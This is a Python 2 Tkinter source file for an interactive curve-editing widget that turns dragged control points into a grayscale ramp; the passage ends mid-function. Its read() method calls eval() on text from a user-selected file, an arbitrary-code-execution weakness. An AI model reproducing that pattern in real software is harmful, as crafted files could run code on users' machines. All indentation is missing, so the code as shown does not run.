#Graph Tool is a widget with movable graph curve
#app=GraphApp(root)
#app.caluculate_ramp() returns current ramp
#from ViewerFramework.VFCommand import Command, CommandGUI
from Tkinter import *
import Tkinter
import tkFileDialog
import types,os
from mglutil.util.callback import CallBackFunction
from mglutil.util.callback import CallbackManager
from mglutil.util.misc import ensureFontCase
import numpy.oldnumeric as Numeric
from mglutil.gui.BasicWidgets.Tk.thumbwheel import ThumbWheel
import Pmw
from Pmw import *
from mglutil.util.misc import deepCopySeq
class GraphApp:
# Initialization
def __init__(self,master=None,callback=None,continuous=1):
self.master=master
self.callback = None
self.callbacks = CallbackManager()
self.canvas=canvas = Canvas(self.master,width=345,height=320,bg='white')
self.toolbar = Frame(master) # Create Toolbar
self.toolbar.pack(side='top', expand=1, fill='both')
self.menuFrame1 = Tkinter.Frame(self.toolbar, relief='raised', borderwidth=3)
self.menuFrame1.pack(side='top', expand=1, fill='x')
self.filebutton = Tkinter.Menubutton(self.menuFrame1, text='File')
self.filebutton.pack(side='left')
self.filemenu = Tkinter.Menu(self.filebutton, {})
self.filemenu.add_command(label='Read', command=self.read_cb)
self.filemenu.add_command(label='Write', command=self.write_cb)
self.filebutton['menu'] = self.filemenu
self.editbutton = Tkinter.Menubutton(self.menuFrame1, text='Edit')
self.editbutton.pack(side='left', anchor='w')
self.editmenu = Tkinter.Menu(self.editbutton, {})
self.editmenu.add_command(label='Reset to first in history', command=self.resetAll_cb)
self.editmenu.add_command(label='Step back in history loop', command=self.stepBack_cb)
self.editmenu.add_command(label='Default Curve', command=self.defaultcurve_cb)
self.editmenu.add_command(label='Invert Curve',command=self.invertGraph)
self.histvar=IntVar()
self.histvar.set(1)
self.editmenu.add_checkbutton(label='Histogram',var=self.histvar,command=self.drawHistogram)
self.editbutton['menu'] = self.editmenu
self.optionType = IntVar()
self.updatebutton = Tkinter.Menubutton(self.menuFrame1, text='Update')
self.updatebutton.pack(side='left', anchor='w')
self.updatemenu = Tkinter.Menu(self.updatebutton,{} )
for v,s in {0:'Continuous',1:'MouseButtonUp',2:'Update'}.items():
self.updatemenu.add_radiobutton(label=s,
var=self.optionType,
value = v,command=self.calloption)
if continuous==1:
self.optionType.set(0)
self.updatebutton['menu'] = self.updatemenu
#Curve Type
self.CurveType = IntVar()
self.CurveType.set(0)
self.Smooth=1
self.curvebutton = Tkinter.Menubutton(self.menuFrame1, text='Curve')
self.curvebutton.pack(side='left', anchor='w')
self.curvemenu = Tkinter.Menu(self.curvebutton,{} )
for v,s in {0:'Smooth',1:'Freehand'}.items():
self.curvemenu.add_radiobutton(label=s,
var=self.CurveType,
value = v,command=self.curveoption)
self.curvebutton['menu'] = self.curvemenu
f1 = Tkinter.Frame(self.master)
f1.pack(side='bottom', fill='both', expand=1)
self.d1scalewheellab=Label(f1,text="Sensitivity")
self.d1scalewheellab.pack(side="left")
self.d1scalewheel=ThumbWheel(width=100, height=26,wheelPad=4,master=f1,labcfg={'fg':'black', 'side':'left', 'text':'Test:'},wheelLabcfg1={'font':(ensureFontCase('times'),14,'bold')},wheelLabcfg2={'font':(ensureFontCase('times'),14,'bold')},canvascfg={'bg':'blue'},min = 0.0,max = 1.0,precision =4,showlabel =0,value =0.013,continuous =0,oneTurn =0.01,size = 200)
self.d1scalewheel.pack(side="left")
#tooltip
self.balloon = Pmw.Balloon(f1)
self.balloon.bind(self.d1scalewheel,"cutoff value for differences in Z xoordinates,small values generate more contours")
self.Updatebutton=Button(f1,text=' Update ',command=self.Update)
self.Updatebutton.pack(side=LEFT)
self.Quitbutton=Button(f1,text=' Dismiss ',command=self.dismiss_cb)
self.Quitbutton.pack(side=RIGHT)
self.canvas.bind("<Button-1>", self.OnCanvasClicked)
self.canvas.bind("<B1-Motion>", self.OnCanvasMouseDrag)
self.canvas.bind("<ButtonRelease-1>", self.OnCanvasMouseUp)
self.canvas.config(closeenough=2.0)
self.canvas.pack(side=BOTTOM, fill=BOTH,expand=1)
self.startpoint=(px,py)=(50,275)
self.endpoint=(px1,py1)=(305,20)
self.newpoints=[(px,py),(px1,py1)]
self.canvas.create_rectangle([(px-1,py),(px1+1,py1)],fill='white',outline="black",width=1)
self.canvas.create_text(46,281,text=0,anchor=N)
#Drawing Graph Sheet
for i in range(1,6):
x=50+i*50
canvas.create_line(x,280,x,275,width=1)
canvas.create_text(x,281,text='%d' %(50*i),anchor=N)
for i in range(1,5):
x=50+i*50
canvas.create_line(x,275,x,20,width=1,fill="gray80")
for i in range(1,6):
y=275-i*50
canvas.create_line(45,y,50,y,width=1)
canvas.create_text(44,y,text='%d' %(50*i),anchor=E)
for i in range(1,5):
y=275-i*50
canvas.create_line(50,y,305,y,width=1,fill="gray80")
(x,y)=self.newpoints[0]
(x1,y1)=self.newpoints[-1]
self.curline=canvas.create_line(self.newpoints,fill='black',width=1)
#GRAY SCALE
grays=[]
for i in range(0,100,1):
grays.append("gray"+"%d" %i)
#grays.reverse()
#bottom one
x1=48
x2=51
self.canvas.create_rectangle([(50,315),(307,300)],fill='white',outline="black",width=0.5)
for a in grays:
if x1>306:
x1=x2=306
self.canvas.create_rectangle([(x1+2.5,314),(x2+2.5,301)],fill=a,outline=a,width=1)
x1=x1+2.5
x2=x2+2.5
#left one
y1=274
y2=271
self.canvas.create_rectangle([(20,275),(5,20)],fill='black',outline="black",width=0.5)
for a in grays:
if y1>275:
y1=y2=275
self.canvas.create_rectangle([(19,y1-2.5),(6,y2-2.5)],fill=a,outline=a,width=1)
y1=y1-2.5
y2=y2-2.5
self.oldpoints=[]
self.canvas.configure(cursor='cross')
self.curovals=[]
self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
# now set the constructor options correctly using the configure method
apply( self.configure, (),{'callback':callback,'continuous':continuous})
self.continuous=continuous
self.mousebuttonup=0
self.update=0
self.range_points=[]
self.history=[]
self.bars=[]
self.default_ramp=[]
self.histvalues=[]
def calloption(self):
tag=self.optionType.get()
self.continuous=0
self.mousebuttonup=0
self.update=0
if tag==0:
self.continuous=1
elif tag==1:
self.mousebuttonup=1
elif tag==2:
self.update=1
def curveoption(self):
tag=self.CurveType.get()
self.Smooth=0
self.Freehand=0
if tag==0:
self.Smooth=1
self.canvas.delete(self.curline)
self.curline=self.canvas.create_line(self.getControlPoints(),smooth=1)
elif tag==1:
self.Freehand=1
self.canvas.delete(self.curline)
self.curline=self.canvas.create_line(self.getControlPoints())
def OnCanvasClicked(self,event):
"""Appends last drag point to controlpoint list if not appended by mouseleave func.
when clicked on any controlpoint removes control point and draws line with remaining
control points."""
self.CLICK_NODRAG=1
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
if hasattr(self,"curx"):
if (self.curx,self.cury) :#not in [self.startpoint,self.endpoint]:
(self.ox,self.oy)=(self.curx,self.cury)
if (self.ox,self.oy) not in self.oldpoints:
self.oldpoints.append((self.ox,self.oy))
if hasattr(self,"curoval"):
self.curovals.append(self.curoval)
self.OrgX=event.x
self.OrgY=event.y
CtlPoints=[]
xcoords=[]
ycoords=[]
#Limiting points not to cross
self.limit_xcoord=[]
for i in range(0,10):
xcoords.append(self.OrgX-i)
ycoords.append(self.OrgY-i)
xcoords.append(self.OrgX+i)
ycoords.append(self.OrgY+i)
if xcoords!=[] and ycoords!=[]:
for x in xcoords:
for y in ycoords:
CtlPoints.append((x,y))
self.range_points=self.oldpoints
self.range_points.sort()
for c in CtlPoints:
if c in self.range_points:
index_c=self.range_points.index(c)
if index_c<len(self.range_points)-1:
self.limit_xcoord.append(self.range_points[index_c+1])
if index_c>0:
self.limit_xcoord.append(self.range_points[index_c-1])
return
else:
self.limit_xcoord.append(self.startpoint)
return
elif index_c==len(self.range_points)-1:
self.limit_xcoord.append(self.range_points[index_c-1])
self.limit_xcoord.append(self.endpoint)
return
self.newd1ramp= self.caluculate_ramp()
def OnCanvasMouseUp(self,event):
CtlPoints=[]
xcoords=[]
ycoords=[]
if hasattr(self,"curx"):
(self.ox,self.oy)=(self.curx,self.cury)
if (self.ox,self.oy) not in self.oldpoints :#not in [self.startpoint,self.endpoint] :
self.oldpoints.append((self.ox,self.oy))
if hasattr(self,"curoval"):
if self.curoval not in self.curovals:
self.curovals.append(self.curoval)
if self.CLICK_NODRAG==1:
#finding out points around the selected point
for i in range(0,10):
xcoords.append(self.OrgX-i)
ycoords.append(self.OrgY-i)
xcoords.append(self.OrgX+i)
ycoords.append(self.OrgY+i)
if xcoords!=[] and ycoords!=[]:
for x in xcoords:
for y in ycoords:
CtlPoints.append((x,y))
for c in CtlPoints:
if c in self.oldpoints:
ind=self.oldpoints.index(c)
op=self.oldpoints[ind]
if ind>0:
prev_oldpoint=self.oldpoints[ind-1]
else:
prev_oldpoint=self.endpoint
del self.oldpoints[ind]
for co in self.curovals:
ov_point1=self.canvas.coords(co)
if len(ov_point1)!=0:
ov_point=(int(ov_point1[0]+2),int(ov_point1[1]+2))
if ov_point==c and ov_point not in [self.startpoint,self.endpoint]:
self.canvas.delete(co)
self.curovals.remove(co)
if hasattr(self,"curx"):
if ov_point==(self.curx,self.cury):
(self.curx,self.cury)=prev_oldpoint
self.draw()
if self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks(self.newd1ramp)
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def OnCanvasMouseDrag(self,event):
self.CLICK_NODRAG=0
CtlPoints=[]
xcoords=[]
ycoords=[]
#making active clickrange to be ten points around clicked point
for i in range(0,10):
xcoords.append(self.OrgX-i)
ycoords.append(self.OrgY-i)
xcoords.append(self.OrgX+i)
ycoords.append(self.OrgY+i)
if xcoords!=[] and ycoords!=[]:
for x in xcoords:
for y in ycoords:
CtlPoints.append((x,y))
for c in CtlPoints:
if c in self.oldpoints:
ind=self.oldpoints.index(c)
op=self.oldpoints[ind]
del self.oldpoints[ind]
for co in self.curovals:
ov_point1=self.canvas.coords(co)
if len(ov_point1)!=0:
ov_point=(int(round(ov_point1[0],3))+2,int(round(ov_point1[1],3))+2)
if ov_point==c :
self.canvas.delete(co)
self.curovals.remove(co)
self.curx=dx=event.x
self.cury=dy=event.y
self.draw()
def draw(self):
"""Draws line,ovals with current controlpoints. """
new1points=[]
curve_points=[]
self.smoothened_points=[]
if self.CLICK_NODRAG==0:
dx=self.curx
dy=self.cury
else:
(dx,dy)=(self.curx,self.cury)=(self.endpoint)
###Limiting xcoords of the current point not to cross adjacent points
if hasattr(self,"limit_xcoord"):
if self.limit_xcoord!=[]:
self.limit_xcoord.sort()
if (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
if (self.curx,self.cury)< self.limit_xcoord[0]:
if self.curx<=self.limit_xcoord[0][0] and self.cury<self.limit_xcoord[0][1]:
dx=self.curx=self.limit_xcoord[0][0]+1
if self.curx<=self.limit_xcoord[0][0] and self.cury>self.limit_xcoord[0][1]:
dx=self.curx=self.limit_xcoord[0][0]
if (self.curx,self.cury)> self.limit_xcoord[1]:
if self.curx>=self.limit_xcoord[1][0] and self.cury>self.limit_xcoord[1][1]:
dx=self.curx=self.limit_xcoord[1][0]-1
if self.curx>=self.limit_xcoord[1][0] and self.cury<self.limit_xcoord[1][1]:
dx=self.curx=self.limit_xcoord[1][0]
#Limit graph with in the axis
if self.curx not in range(50,305):
if self.curx<50:
self.curx=dx=50
else:
self.curx=dx=305
if self.cury not in range(20,275):
if self.cury<20:
self.cury=dy=20
else:
self.cury=dy=275
#adding start,end points
new1points.append(self.startpoint)
new1points.append(self.endpoint)
#adding current point to list
if (dx,dy) not in new1points and (dx,dy) not in [self.startpoint,self.endpoint]:
new1points.append((dx,dy))
#adding oldpoints to list
if hasattr(self,"ox"):
for op in self.oldpoints:
if op not in new1points:
new1points.append(op)
new1points.sort()
#removing oval point that is on drag
if hasattr(self,"curoval"):
if self.curoval not in self.curovals:
self.canvas.delete(self.curoval)
self.canvas.delete(self.curline)
#if points that start with 50 or 51 or 305,304 other than start ,end
#points exists remove start or end points
#remove ovals
#finding oval for start point and endpoint
for i in new1points:
if i[0]==51 or i[0]==50:
if i!=self.startpoint:
if self.startpoint in new1points:
new1points.remove(self.startpoint)
###removing start point oval
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
for i in new1points:
if i[0]==304 or i[0]==305:
if i!=self.endpoint :
if self.endpoint in new1points:
new1points.remove(self.endpoint)
###removing end point oval
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
new1points.sort()
for (x,y) in new1points:
curve_points.append(x)
curve_points.append(y)
self.smoothened_points= self.smooth(curve_points)
#drawing line
if len(self.smoothened_points)>2:
if self.Smooth:
self.curline=self.canvas.create_line(self.smoothened_points)
else:
self.curline=self.canvas.create_line(curve_points)
else:
if curve_points[0]==50 or 51:
if self.Smooth:
self.curline=self.canvas.create_line(curve_points,smooth=1)
else:
self.curline=self.canvas.create_line(curve_points)
else:
self.curline=self.canvas.create_line(self.startpoint,self.endpoint)
##Adding oval when start or end point in new1points
coval_coords=[]
for i in self.curovals:
coval_coords.append(self.canvas.coords(i))
if self.endpoint in new1points:
co=self.canvas.create_oval(self.endpoint[0]-2,self.endpoint[-1]-2,self.endpoint[0]+2,self.endpoint[-1]+2,width=1,outline='black',fill='black')
endco_coords =self.canvas.coords(co)
if endco_coords not in coval_coords:
self.curovals.append(co)
if self.startpoint in new1points:
co=self.canvas.create_oval(self.startpoint[0]-2,self.startpoint[-1]-2,self.startpoint[0]+2,self.startpoint[-1]+2,width=1,outline='black',fill='black')
startco_coords=self.canvas.coords(co)
if startco_coords not in coval_coords:
self.curovals.append(co)
#drawing ovals
if (self.curx,self.cury)!=self.endpoint:
self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
if (self.curx,self.cury)==self.endpoint and self.endpoint in new1points:
self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
self.newd1ramp= self.caluculate_ramp()
if self.continuous:
self.callbacks.CallCallbacks(self.newd1ramp)
######## convert coordinates to ramp##################
def caluculate_ramp(self):
"""
"""
dramp=[]
mypoints=[]
mynewpoints=[]
self.oldpoints.sort()
calcpoints=[]
#if self.continuous :
if hasattr(self,"curx"):
if (self.curx,self.cury) not in self.oldpoints and (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
calcpoints.append((self.curx,self.cury))
if len(self.oldpoints)!=0:
for o in self.oldpoints:
if o not in calcpoints:
calcpoints.append(o)
if self.startpoint not in calcpoints:
calcpoints.append(self.startpoint)
if self.endpoint not in calcpoints:
calcpoints.append(self.endpoint)
calcpoints.sort()
length=len(calcpoints)
for l in range(length):
if l+1<=length-1:
mypoints=[calcpoints[l],calcpoints[l+1]]
if calcpoints[l] not in mynewpoints:
mynewpoints.append( calcpoints[l])
(x1,y1)=calcpoints[l]
(x2,y2)=calcpoints[l+1]
if x1>x2:
dcx=x1-x2
px=x1-1
else:
dcx=x2-x1
px=x1+1
if y1>y2:
dcy=y1-y2
if dcx>=1:
py=y1-float(dcy)/float(dcx)
else:
py=y1
else:
dcy=y2-y1
if dcx>=1:
py=y1+float(dcy)/float(dcx)
else:
py=y2
mynewpoints.append( (px,int(round(py))))
for dc in range(dcx-1):
if x1>x2:
px=px-1
else:
px=px+1
if y1>y2:
if dcx>=1:
py=py-float(dcy)/float(dcx)
else:
py=y1
else:
if dcx>=1:
py=py+float(dcy)/float(dcx)
else:
py=y2
mynewpoints.append( (px,int(round(py))))
ramp=[]
for r in mynewpoints:
#scale
ra=float(275-r[1])
if ra>=256:
ra=255.0
ramp.append(ra)
dramp=Numeric.array(ramp,'f')
if len(dramp)!=0:
return dramp
else:
dramp=Numeric.arange(0,256,1,'f')
return dramp
def get(self):
if hasattr(self,"newd1ramp"):
return self.newd1ramp
else:
return self.caluculate_ramp()
def configure(self, **kw):
if 'type' in kw.keys(): # make sure type is set first
self.setType(kw['type'])
del kw['type']
for key,value in kw.items():
if key=='callback':
self.setCallbacks(value)
def setCallbacks(self, cb):
"""Set widget callback. Must be callable function. Callback is called
every time the widget value is set/modified"""
assert cb is None or callable(cb) or type(cb) is types.ListType,\
"Illegal callback: must be either None or callable. Got %s"%cb
if cb is None: return
elif type(cb) is types.ListType:
for func in cb:
assert callable(func), "Illegal callback must be callable. Got %s"%func
self.callbacks.AddCallback(func)
else:
self.callbacks.AddCallback(cb)
self.callback = cb
def invertGraph(self):
"""This function is for inverting graph by reverse computing controlpoints"""
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
invert_points=[]
#self.oldpoints=[]
points=self.getControlPoints()
if len(points)<2:
points=[self.startpoint,self.endpoint]
for p in points:
if p[1] in range(20,276):
y=275 -(p[1]-20)
invert_points.append((p[0],y))
self.reset()
###################################################
#Some times start and end points are not deleted
#So for deleting them canvas.find_enclosed points at
#startpoint and endpoint are caluculated(returns alist of
#canvas objects present there) and if the coords of
#any canvas objects matches with start or end point that gets deleted
#####################################################
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
self.canvas.delete(self.curline)
if self.Smooth:
self.curline=self.canvas.create_line(invert_points,smooth=1)
else:
self.curline=self.canvas.create_line(invert_points)
self.oldpoints=invert_points
for p in invert_points:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =invert_points[-2]
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks([self.newd1ramp])
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def defaultcurve_cb(self):
"""draws curve with default points"""
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
points=[]
self.default_points=[]
self.oldpoints=[]
self.d1scalewheel.set(0.013)
self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
self.reset()
self.canvas.delete(self.curline)
self.default_points.sort()
if self.Smooth:
self.curline=self.canvas.create_line(self.default_points,smooth=1)
else:
self.curline=self.canvas.create_line(self.default_points)
self.oldpoints=self.default_points
for p in self.default_points:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =self.default_points[-2]
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks(self.newd1ramp)
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
self.default_ramp= self.newd1ramp
def read_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Read Graph"
fileName = self.fileOpenAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.read(fileName)
def read( self,fileName):
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
fptr=open(fileName,"r")
data=fptr.readlines()
cpoints=data[0][:-1]
sensitivity=data[1]
self.d1scalewheel.set(eval(sensitivity))
if len(cpoints)==0:
return
else:
points=cpoints
self.oldpoints=[]
self.reset()
if hasattr(self,"curline"):
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
self.curovals.remove(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
if self.Smooth:
self.curline=self.canvas.create_line(eval(points),smooth=1)
else:
self.curline=self.canvas.create_line(eval(points))
self.readpoints=self.oldpoints=eval(points)[1:-1]
for p in eval(points)[1:-1]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =eval(points)[-2]
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def fileOpenAsk(self, idir=None, ifile=None, types=None,
title='Open'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.askopenfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
def write_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Write Graph"
fileName = self.fileSaveAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.write(fileName)
def write(self,fileName):
fptr=open(fileName,"w")
points= self.getControlPoints()
points.sort()
fptr.write(str(points))
fptr.write("\n")
fptr.write(str(self.d1scalewheel.get()))
fptr.close()
def fileSaveAsk(self, idir=None, ifile=None, types = None,
title='Save'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.asksaveasfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
def reset(self):
"""This function deletes current line removes current ovals"""
self.canvas.delete(self.curline)
self.oldpoints=[]
for c in self.curovals:
self.canvas.delete(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
if hasattr(self,"curoval"):
delattr(self,"curoval")
if hasattr(self,"curx"):
delattr(self,"curx")
def resetAll_cb(self):
"""Resetting curve as slant line 0 to 255"""
self.reset()
self.curline=self.canvas.create_line([self.startpoint,self.endpoint],width=1,fill='black')
for p in [self.startpoint,self.endpoint]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
self.oldpoints=[self.startpoint,self.endpoint]
(self.curx,self.cury)=self.endpoint
self.d1scalewheel.set(0.013)
if self.continuous or self.mousebuttonup:
self.newd1ramp=Numeric.arange(0,256,1,'f')
self.callbacks.CallCallbacks(self.newd1ramp)
#self.histvar.set(0)
self.history=[]
def stepBack_cb(self):
"""when stepBack button clicked previous step is displayed.History of
all the steps done is remembered and when stepback clicked from history
list previous step is shown and that step is removed from history list """
if self.history!=[]:
if len(self.history)==1:
self.resetAll_cb()
else:
del self.history[-1]
pns = self.history[-1][0]
#deleting
self.oldpoints=pns
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
###################################################
#Some times start and end points are not deleted
#So for deleting them canvas.find_enclosed points at
#startpoint and endpoint are caluculated(returns alist of
#canvas objects present there) and if the coords of
#any canvas objects matches with start or end point that gets deleted
#####################################################
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
pns.sort()
#if no start or end points
if pns[0][0]>51 :
pns.insert(0,self.startpoint)
l=len(pns)
if pns[-1][0]<304:
pns.insert(l,self.endpoint)
#if start or endpoints and points with (50or 51) or (305or305)
if self.startpoint in pns:
for p in pns:
if p!=self.startpoint:
if p[0]== 50 or p[0]==51:
pns.remove(self.startpoint)
if self.endpoint in pns:
for p in pns:
if p!=self.endpoint:
if p[0]==305 or p[0]==304:
pns.remove(self.endpoint)
print pns
if self.Smooth:
self.curline=self.canvas.create_line(pns,width=1,fill='black',smooth=1)
else:
self.curline=self.canvas.create_line(pns,width=1,fill='black')
for p in pns:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
self.d1scalewheel.set(self.history[-1][1])
if self.continuous or self.mousebuttonup:
self.newd1ramp=Numeric.arange(0,256,1,'f')
self.callbacks.CallCallbacks(self.newd1ramp)
(self.curx,self.cury)=self.endpoint
def getControlPoints(self):
"""fuction to get current control points of the curve"""
if not self.oldpoints==[self.startpoint,self.endpoint]:
for i in range(len(self.oldpoints)):
if self.startpoint in self.oldpoints:
self.oldpoints.remove(self.startpoint)
if self.endpoint in self.oldpoints:
self.oldpoints.remove(self.endpoint)
self.controlpoints=[]
if hasattr(self,"curoval"):
c=self.canvas.coords(self.curoval)
if len(c)!=0:
if (int(c[0]+2),int(c[1]+2)) not in self.oldpoints and (int(c[0]+2),int(c[1]+2)) not in [self.startpoint,self.endpoint]:
self.controlpoints.append((int(c[0]+2),int(c[1]+2)))
for op in self.oldpoints:
self.controlpoints.append(op)
self.controlpoints.sort()
if len(self.controlpoints)>0:
if self.controlpoints[0][0]==50 or self.controlpoints[0][0]==51 :
pass
else:
self.controlpoints.append(self.startpoint)
self.controlpoints.sort()
if self.controlpoints[-1][0]==305 or self.controlpoints[-1][0]==304:
pass
else:
self.controlpoints.append(self.endpoint)
self.controlpoints.sort()
return self.controlpoints
def setControlPoints(self,points):
"""function to set curve control points"""
assert isinstance(points, types.ListType),"Illegal type for points"
for (x,y) in points:
assert x in range(50,306),"coordinates are out of range,x should be in [50,305]"
assert y in range(20,276),"coordinates are out of range,y should be in [20,275]"
self.oldpoints=[]
self.controlpoints=[]
self.reset()
self.oldpoints=self.controlpoints=points
self.controlpoints.sort()
if self.controlpoints[0]!=self.startpoint:
self.controlpoints.append(self.startpoint)
if self.controlpoints[-1]!=self.endpoint:
self.controlpoints.append(self.endpoint)
self.canvas.delete(self.curline)
self.controlpoints.sort()
if self.Smooth:
self.curline=self.canvas.create_line( self.controlpoints,smooth=1)
else:
self.curline=self.canvas.create_line( self.controlpoints)
for p in self.controlpoints[1:-1]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury)= self.controlpoints[-2]
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks(self.newd1ramp)
def setSensitivity(self,val):
self.d1scalewheel.set(val)
def Update(self):
if self.update==1:
dramp=self.caluculate_ramp()
self.newd1ramp=dramp
self.callbacks.CallCallbacks(dramp)
def dismiss_cb(self):
try:
if self.master.winfo_ismapped():
self.master.withdraw()
except:
if self.master.master.winfo_ismapped():
self.master.master.withdraw()
#draw Histogram
def removeHistogram(self):
"""removes Histograms"""
for b in self.bars:
self.canvas.delete(b)
self.bars=[]
def drawHistogram(self):
"""This function draws histogram from list of pixel counts ,one for
each value in the source image"""
self.removeHistogram()
if self.histvar.get():
h=self.histvalues
if h==[]:
return
list_pixels_count=h
c=[]
maxc=max(list_pixels_count)
if maxc==0:
return
if list_pixels_count.index(maxc):
list_pixels_count.remove(maxc)
list_pixels_count.insert(255,0)
for i in list_pixels_count[:256]:
max_list=max(list_pixels_count)
if max_list==0:
return
val=i*200/max_list
c.append(val)
for i in range(0,len(c)):
x1=50+i
x2=50+i
y1=275-c[i]
y2=275
r=self.canvas.create_line([(x1,y1),(x2,y2)],fill="gray70",width=1)
self.bars.append(r)
#displaying line and ovals ontop
self.canvas.tkraise(self.curline)
for i in self.curovals:
self.canvas.tkraise(i)
if hasattr(self,"curoval"):
self.canvas.tkraise(self.curoval)
self.canvas.update()
##Update Histograms on Graphtool
#if self.update!=1:
# prev_option=self.optionType.get()
# self.optionType.set(2)
# self.update=1
# self.Update()
# self.optionType.set(prev_option)
# self.update=0
# return
################SMOOTHING CODE############################
def addcurve(self,out, xy, steps):
add = out.append
for i in range(1, steps+1):
t = float(i) / steps; t2 = t*t; t3 = t2*t
u = 1.0 - t; u2 = u*u; u3 = u2*u
add(xy[0]*u3 + 3*(xy[2]*t*u2 + xy[4]*t2*u) + xy[6]*t3)
add(xy[1]*u3 + 3*(xy[3]*t*u2 + xy[5]*t2*u) + xy[7]*t3)
def smooth(self,xy, steps=12):
if not xy:
return xy
closed = xy[0] == xy[-2] and xy[1] == xy[-1]
out = []
if closed:
# connect end segment to first segment
control = (
0.500*xy[-4] + 0.500*xy[0],
